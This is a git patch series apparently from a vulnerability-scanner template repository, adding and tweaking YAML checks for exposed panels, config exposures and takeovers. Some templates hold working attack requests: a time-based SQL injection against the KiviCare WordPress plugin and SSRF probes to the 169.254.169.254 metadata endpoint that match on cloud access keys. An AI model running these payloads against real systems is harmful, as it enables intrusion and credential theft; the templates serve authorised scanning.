index a43e5a1a4d..e617718b45 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -36,6 +36,10 @@ requests: words: - ".sh" - ".cgi" + - type: word + part: header + words: + - 'application/octet-stream' condition: and - type: status From 33078fdfa91c6d6300e27fa9ea4293dc8861e562 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Dec 2022 13:06:52 +0000 Subject: [PATCH 1342/1415] Auto Generated New Template Addition List [Fri Dec 16 13:06:52 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 16323993f7..681c2b8c83 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ cves/2021/CVE-2021-24827.yaml cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml +cves/2022/CVE-2022-1595.yaml cves/2022/CVE-2022-2314.yaml cves/2022/CVE-2022-4050.yaml cves/2022/CVE-2022-45917.yaml @@ -46,6 +47,7 @@ network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml technologies/icecast-server-detect.yaml +technologies/mikrotik-httpproxy.yaml technologies/pagespeed-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml From d50395150377bf2fff6f4b7e9d74b2bada4a83cd Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 16 Dec 2022 19:01:50 +0530 Subject: [PATCH 1343/1415] updated dnssec to use matcher instead of extractors (#6380) --- dns/dnssec-detection.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 6563ec92fd..bba38137b3 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -16,9 +16,8 @@ dns: - name: "{{FQDN}}" type: DS - extractors: + matchers: - type: regex - group: 1 regex: - "IN\tDS\t(.+)" From fa13b8d88915e3030a46c97dfaac764b271edf42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 22:45:45 +0530 Subject: [PATCH 1344/1415] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index ced3ce9a39..dd0e614fee 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -23,7 +23,7 @@ requests: matchers: - type: word words: - - "sitemap" + - "sitemap>" case-insensitive: true - type: word From 4472262319e8c17dacc75ff44cae204328e3d017 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:00:30 +0530 Subject: [PATCH 1345/1415] updated-matcher --- cves/2022/CVE-2022-1595.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 266ae72170..9d5329b78f 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -29,7 +29,7 @@ requests: part: header regex: - "Location: ([a-zA-Z0-9_.\\/-]+)" - - "wordpress" + - "wordpress_" condition: and - type: status From 191a9eae615a1c555c360667a9a482de241fc1aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:11:56 +0530 Subject: [PATCH 1346/1415] Update gyra-master-admin.yaml --- exposed-panels/gyra-master-admin.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/gyra-master-admin.yaml b/exposed-panels/gyra-master-admin.yaml index 5da78947bf..bb89fa451e 100644 --- a/exposed-panels/gyra-master-admin.yaml +++ b/exposed-panels/gyra-master-admin.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Login | GYRA Master Admin" - tags: panel,master,admin + tags: panel,master,admin,gyra requests: - method: GET @@ -17,6 +17,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Login | GYRA Master Admin" From 1b4413709ea71abff35c76be9d08501b6aede7d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:18:35 +0530 Subject: [PATCH 1347/1415] updated-tag --- vulnerabilities/qibocms-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index f80730e288..8d26a91827 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -6,7 +6,7 @@ info: severity: high metadata: verified: true - tags: qibocms,arbitary,download + tags: qibocms,lfr requests: - method: GET From 1a2a985b14a3bc72481158388b1d1c5d12a976d5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:30:09 +0530 Subject: [PATCH 1348/1415] updated-tags --- exposures/logs/firebase-debug-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/firebase-debug-log.yaml b/exposures/logs/firebase-debug-log.yaml index f68c3cb876..ba65f89d66 100644 --- a/exposures/logs/firebase-debug-log.yaml +++ b/exposures/logs/firebase-debug-log.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true github-query: filename:firebase-debug.log - tags: exposure,firebase,log,debug + tags: exposure,firebase,logs,debug requests: - method: GET From 604cadbc40afc99e3bfca389c88aec89d179d3cf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:30:59 +0530 Subject: [PATCH 1349/1415] Update npm-debug-log.yaml --- exposures/logs/npm-debug-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/npm-debug-log.yaml b/exposures/logs/npm-debug-log.yaml index 24856ffbd5..30d77a02d3 100644 --- a/exposures/logs/npm-debug-log.yaml +++ b/exposures/logs/npm-debug-log.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true github-query: filename:npm-debug.log - tags: exposure,npm,log,debug + tags: exposure,npm,logs,debug requests: - method: GET From a6094c0e0e57ba721c51c1da12997163bc6821f4 Mon Sep 17 00:00:00 2001 From: Irresistible-K <112374769+Irresistible-K@users.noreply.github.com> Date: Sat, 17 Dec 2022 01:35:36 +0530 Subject: [PATCH 1350/1415] Fix typo (#6381) FIxed a spelling error --- .github/workflows/template-db-indexer.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 19f985b0c9..ce977e552d 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -14,7 +14,7 @@ jobs: with: go-version: 1.17 - - name: Intalling Indexer + - name: Installing Indexer run: | git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github git clone https://github.com/projectdiscovery/nucleish-api.git @@ -26,4 +26,4 @@ jobs: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} run: | - generate-index -mode templates \ No newline at end of file + generate-index -mode templates From 71f7c3e5fadb7972f5a41914e8a19a537562951a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 17 Dec 2022 04:34:10 +0530 Subject: [PATCH 1351/1415] more validation to avoid false positive (#6383) --- takeovers/pantheon-takeover.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index 41dfc588e4..b752ac818f 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -23,3 +23,7 @@ requests: - type: word words: - "The gods are wise, but do not know of the site which you seek." + + - type: dsl + dsl: + - '!contains(host,"apigee.io")' \ No newline at end of file From 0970ef285e1618dc77aaddd9d0323a9d02f01c94 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 18 Dec 2022 13:03:50 +0530 Subject: [PATCH 1352/1415] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index b199ed62ba..62b6b5c62d 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -16,6 +16,7 @@ requests: - "{{BaseURL}}/ilias/login.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word words: From aca47e49b8b51a2c47a1bbdbbea06fed600e4f9e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 18 Dec 2022 13:13:56 +0530 Subject: [PATCH 1353/1415] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index b673b32d37..e8d12ec491 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -24,6 +24,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/prweb/PRAuth/app/default/" + stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and From 6b45d0be7a8894b55d63b539eb07e20a1395e829 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 19:53:30 +0530 Subject: [PATCH 1354/1415] Create amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 28 +++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/amazon/amazon-ec2-ssrf.yaml diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml new file mode 100644 index 0000000000..159802e3de --- /dev/null +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -0,0 +1,28 @@ +id: amazon-ec2-ssrf +info: + name: Amazon EC2 SSRF + author: DhiyaneshDk + severity: critical + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 + metadata: + verified: "true" + shodan-query: "Server: EC2ws" + tags: aws,ec2,ssrf,amazon + +requests: + - raw: + - |+ + GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "AccessKeyId" + - "SecretAccessKey" + condition: and From dece342c2109b39db19f2e513cc1a12d11e6b1c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 22:23:05 +0530 Subject: [PATCH 1355/1415] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 159802e3de..3c769f6ce8 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,4 +1,5 @@ id: amazon-ec2-ssrf + info: name: Amazon EC2 SSRF author: DhiyaneshDk @@ -8,7 +9,6 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: - verified: "true" shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon @@ -18,7 +18,13 @@ requests: GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} + - |+ + GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word part: body @@ -26,3 +32,7 @@ requests: - "AccessKeyId" - "SecretAccessKey" condition: and + + - type: status + status: + - 200 From 36d51a365fee0b701017224c42dbe0d0878f057d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Dec 2022 10:57:35 +0000 Subject: [PATCH 1356/1415] Auto Generated New Template Addition List [Mon Dec 19 10:57:35 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 681c2b8c83..32f111c5f2 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ misconfiguration/unauth-zwave-mqtt.yaml misconfiguration/vernemq-status-page.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml +network/detection/mysql-detect.yaml network/detection/redis-detect.yaml network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml @@ -53,3 +54,4 @@ vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml vulnerabilities/vmware/vmware-nsx-stream-rce.yaml vulnerabilities/zend/zend-v1-xss.yaml +vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml From 6f35b22cc121e4dcfbbfecb340f473c4d3812c96 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 19 Dec 2022 18:53:58 +0530 Subject: [PATCH 1357/1415] Added template for CVE-2022-0786 --- cves/2022/CVE-2022-0786.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-0786.yaml diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml new file mode 100644 index 0000000000..1844dee47a --- /dev/null +++ b/cves/2022/CVE-2022-0786.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0786 + +info: + name: KiviCare < 2.3.9 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30 + - https://wordpress.org/plugins/kivicare-clinic-management-system/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0786 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,kivicare-clinic-management-system,unauth + +requests: + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Doctor details")' + condition: and \ No newline at end of file From 1d3b12ea8485c00479a31d58e94a773628d61e9e Mon Sep 17 00:00:00 2001 From: Mihhail Sokolov Date: Mon, 19 Dec 2022 15:56:12 +0100 Subject: [PATCH 1358/1415] Create gpc-json.yaml --- miscellaneous/gpc-json.yaml | 50 +++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 miscellaneous/gpc-json.yaml diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml new file mode 100644 index 0000000000..3e616bf16f --- /dev/null +++ b/miscellaneous/gpc-json.yaml @@ -0,0 +1,50 @@ +id: gpc-json + +info: + name: gpc.json file + author: MihhailSokolov + severity: info + description: The website defines a Global Privacy Control policy. + tags: misc,generic + +requests: + - method: GET + path: + - "{{RootURL}}/.well-known/gpc.json" + - "{{RootURL}}/gpc.json" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gpc" + + - type: dsl + dsl: + - "len(body) <= 1024 && len(body) > 0" + + extractors: + - type: json + part: body + name: gpc-value + json: + - ".gpc" + + - type: json + part: body + name: gpc-last-update + json: + - ".lastUpdate?" + + - type: json + part: body + name: gpc-version + json: + - ".version?" From d82d0ec613b41c80860591ebba2ad40ffe75e8f2 Mon Sep 17 00:00:00 2001 From: Mihhail Sokolov Date: Mon, 19 Dec 2022 16:26:14 +0100 Subject: [PATCH 1359/1415] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 3e616bf16f..4979e87f0b 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -36,13 +36,13 @@ requests: name: gpc-value json: - ".gpc" - + - type: json part: body name: gpc-last-update json: - ".lastUpdate?" - + - type: json part: body name: gpc-version From 4f2e054f2e21f2dc7490cd70ff08ce7b26aa7778 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Dec 2022 16:46:02 +0000 Subject: [PATCH 1360/1415] Auto README Update [Mon Dec 19 16:46:02 UTC 2022] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f8f3e9f053..f6185d557e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**321 directories, 4736 files**. +**328 directories, 4791 files**. From fba897db97ebce874dc70960dffa357ee9e38bc3 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:35:57 +0000 Subject: [PATCH 1361/1415] Create xfinity-panel.yml --- exposed-panels/xfinity-panel.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/xfinity-panel.yml diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yml new file mode 100644 index 0000000000..2a773bd8cf --- /dev/null +++ b/exposed-panels/xfinity-panel.yml @@ -0,0 +1,27 @@ +id: xfinity-panel + +info: + name: xfinity Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: title:"xfinity" + tags: panel,xfinity + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'XFINITY' + - 'Gateway > Login' + condition: and + + - type: status + status: + - 200 From b318468220340e7d2389707bd6138125ad652e9b Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:38:38 +0000 Subject: [PATCH 1362/1415] Add files via upload --- iot/carel-platvisor-panel.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/carel-platvisor-panel.yml diff --git a/iot/carel-platvisor-panel.yml b/iot/carel-platvisor-panel.yml new file mode 100644 index 0000000000..08fb91e3e6 --- /dev/null +++ b/iot/carel-platvisor-panel.yml @@ -0,0 +1,25 @@ +id: carel-platvisor-panel + +info: + name: CAREL Pl@ntVisor Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: title:"CAREL Pl@ntVisor" + tags: scada,iot,panels,carel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'CAREL Pl@ntVisor' + + - type: status + status: + - 200 \ No newline at end of file From c81a7dc1ae0f023509753d3abbdb8b713578d942 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:41:14 +0000 Subject: [PATCH 1363/1415] Create hue-personal-wireless-panel.yml --- iot/hue-personal-wireless-panel.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 iot/hue-personal-wireless-panel.yml diff --git a/iot/hue-personal-wireless-panel.yml b/iot/hue-personal-wireless-panel.yml new file mode 100644 index 0000000000..4240f7b282 --- /dev/null +++ b/iot/hue-personal-wireless-panel.yml @@ -0,0 +1,27 @@ +id: hue-personal-wireless-panel + +info: + name: HUE personal wireless lighting Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: http.title:"hue personal wireless lighting" + tags: hue,iot,wireless + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'hue personal wireless lighting' + - 'Open Source' + condition: and + + - type: status + status: + - 200 From 4cb87862a6c38fa22299304cf5361fab24895c2b Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:46:52 +0000 Subject: [PATCH 1364/1415] Create cloud-config.yml --- exposures/configs/cloud-config.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/configs/cloud-config.yml diff --git a/exposures/configs/cloud-config.yml b/exposures/configs/cloud-config.yml new file mode 100644 index 0000000000..c117e75a1b --- /dev/null +++ b/exposures/configs/cloud-config.yml @@ -0,0 +1,28 @@ +id: cloud-config + +info: + name: Cloud Config File Exposure + author: Hardik-Solanki + severity: medium + metadata: + verified: true + github-query: path:cloud-config.txt + tags: cloud,files,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/cloud-config.txt' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ssh_authorized_keys:' + - 'packages:' + condition: and + + - type: status + status: + - 200 From 17a7893bc1fda1adbae62ea775f849c71a429da7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:40:47 +0530 Subject: [PATCH 1365/1415] Update xfinity-panel.yml --- exposed-panels/xfinity-panel.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yml index 2a773bd8cf..b9c1477866 100644 --- a/exposed-panels/xfinity-panel.yml +++ b/exposed-panels/xfinity-panel.yml @@ -1,7 +1,7 @@ id: xfinity-panel info: - name: xfinity Panel + name: Xfinity Panel author: Hardik-Solanki severity: info metadata: @@ -18,9 +18,9 @@ requests: - type: word part: body words: - - 'XFINITY' - - 'Gateway > Login' - condition: and + - "alt='XFINITY'" + - "title='XFINITY'" + condition: or - type: status status: From a71a8287141cd124292fc3540881c0bf7ddf7cab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:46:36 +0530 Subject: [PATCH 1366/1415] Update and rename carel-platvisor-panel.yml to carel-plantvisor-panel.yaml --- ...el-platvisor-panel.yml => carel-plantvisor-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename iot/{carel-platvisor-panel.yml => carel-plantvisor-panel.yaml} (70%) diff --git a/iot/carel-platvisor-panel.yml b/iot/carel-plantvisor-panel.yaml similarity index 70% rename from iot/carel-platvisor-panel.yml rename to iot/carel-plantvisor-panel.yaml index 08fb91e3e6..30b6c219e1 100644 --- a/iot/carel-platvisor-panel.yml +++ b/iot/carel-plantvisor-panel.yaml @@ -1,4 +1,4 @@ -id: carel-platvisor-panel +id: carel-plantvisor-panel info: name: CAREL Pl@ntVisor Panel @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: title:"CAREL Pl@ntVisor" - tags: scada,iot,panels,carel + tags: panels,scada,iot,carel requests: - method: GET @@ -19,7 +19,9 @@ requests: part: body words: - 'CAREL Pl@ntVisor' + - 'alt="CAREL' + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 115d02a5733a6d07ddc0bec2c122f6c2cca94b05 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:46:47 +0530 Subject: [PATCH 1367/1415] Rename xfinity-panel.yml to xfinity-panel.yaml --- exposed-panels/{xfinity-panel.yml => xfinity-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{xfinity-panel.yml => xfinity-panel.yaml} (100%) diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yaml similarity index 100% rename from exposed-panels/xfinity-panel.yml rename to exposed-panels/xfinity-panel.yaml From 2bc4df7b04bbf54cd40cc60c10adc06f3e0f22bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:49:38 +0530 Subject: [PATCH 1368/1415] Update and rename hue-personal-wireless-panel.yml to hue-personal-wireless-panel.yaml --- ...al-wireless-panel.yml => hue-personal-wireless-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename iot/{hue-personal-wireless-panel.yml => hue-personal-wireless-panel.yaml} (79%) diff --git a/iot/hue-personal-wireless-panel.yml b/iot/hue-personal-wireless-panel.yaml similarity index 79% rename from iot/hue-personal-wireless-panel.yml rename to iot/hue-personal-wireless-panel.yaml index 4240f7b282..48312122b8 100644 --- a/iot/hue-personal-wireless-panel.yml +++ b/iot/hue-personal-wireless-panel.yaml @@ -1,11 +1,11 @@ id: hue-personal-wireless-panel info: - name: HUE personal wireless lighting Panel + name: HUE Personal Wireless Lighting Panel author: Hardik-Solanki severity: info metadata: - shodan-query: http.title:"hue personal wireless lighting" + shodan-query: title:"hue personal wireless lighting" tags: hue,iot,wireless requests: From 8944e5d67480205e3088f08f3448172413f0ffb4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:54:10 +0530 Subject: [PATCH 1369/1415] Update and rename cloud-config.yml to cloud-config.yaml --- exposures/configs/{cloud-config.yml => cloud-config.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{cloud-config.yml => cloud-config.yaml} (100%) diff --git a/exposures/configs/cloud-config.yml b/exposures/configs/cloud-config.yaml similarity index 100% rename from exposures/configs/cloud-config.yml rename to exposures/configs/cloud-config.yaml From 4d6f479d3b6d6392b53044f6ef74136a797b0ec7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:56:55 +0530 Subject: [PATCH 1370/1415] Update cloud-config.yaml --- exposures/files/cloud-config.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/files/cloud-config.yaml b/exposures/files/cloud-config.yaml index 92d768a692..8ee6c0e892 100644 --- a/exposures/files/cloud-config.yaml +++ b/exposures/files/cloud-config.yaml @@ -1,8 +1,8 @@ id: cloud-config info: - name: Cloud Config Yaml - File Disclosure - author: DhiyaneshDK + name: Cloud Config File Exposure + author: DhiyaneshDK,Hardik-Solanki severity: medium reference: https://www.exploit-db.com/ghdb/7959 metadata: @@ -15,6 +15,7 @@ requests: path: - "{{BaseURL}}/cloud-config.yml" - "{{BaseURL}}/core-cloud-config.yml" + - '{{BaseURL}}/cloud-config.txt' stop-at-first-match: true matchers-condition: and From 916ac8c907c93fcc5508bbfc4cb8ebe27b2deeb2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:57:29 +0530 Subject: [PATCH 1371/1415] Delete cloud-config.yaml --- exposures/configs/cloud-config.yaml | 28 ---------------------------- 1 file changed, 28 deletions(-) delete mode 100644 exposures/configs/cloud-config.yaml diff --git a/exposures/configs/cloud-config.yaml b/exposures/configs/cloud-config.yaml deleted file mode 100644 index c117e75a1b..0000000000 --- a/exposures/configs/cloud-config.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: cloud-config - -info: - name: Cloud Config File Exposure - author: Hardik-Solanki - severity: medium - metadata: - verified: true - github-query: path:cloud-config.txt - tags: cloud,files,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/cloud-config.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ssh_authorized_keys:' - - 'packages:' - condition: and - - - type: status - status: - - 200 From ab7f19491bf1344e4d2a746e3a4cad5417eb152e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 10:51:20 +0530 Subject: [PATCH 1372/1415] Create digital-ocean-ssrf.yaml --- vulnerabilities/other/digital-ocean-ssrf.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/digital-ocean-ssrf.yaml diff --git a/vulnerabilities/other/digital-ocean-ssrf.yaml b/vulnerabilities/other/digital-ocean-ssrf.yaml new file mode 100644 index 0000000000..0f806ae067 --- /dev/null +++ b/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -0,0 +1,36 @@ +id: digital-ocean-ssrf + +info: + name: Digital Ocean SSRF + author: DhiyaneshDk + severity: critical + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 + + +requests: + - raw: + - |+ + GET {{BaseURL}}/metadata/v1.json HTTP/1.1 + Host: {{Hostname}} + + - |+ + GET http://169.254.169.254/metadata/v1.json HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + unsafe: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"droplet_id":' + - '"hostname":' + condition: and + + - type: status + status: + - 200 From e9407f577aa7ef01cb169958b673d5654d441496 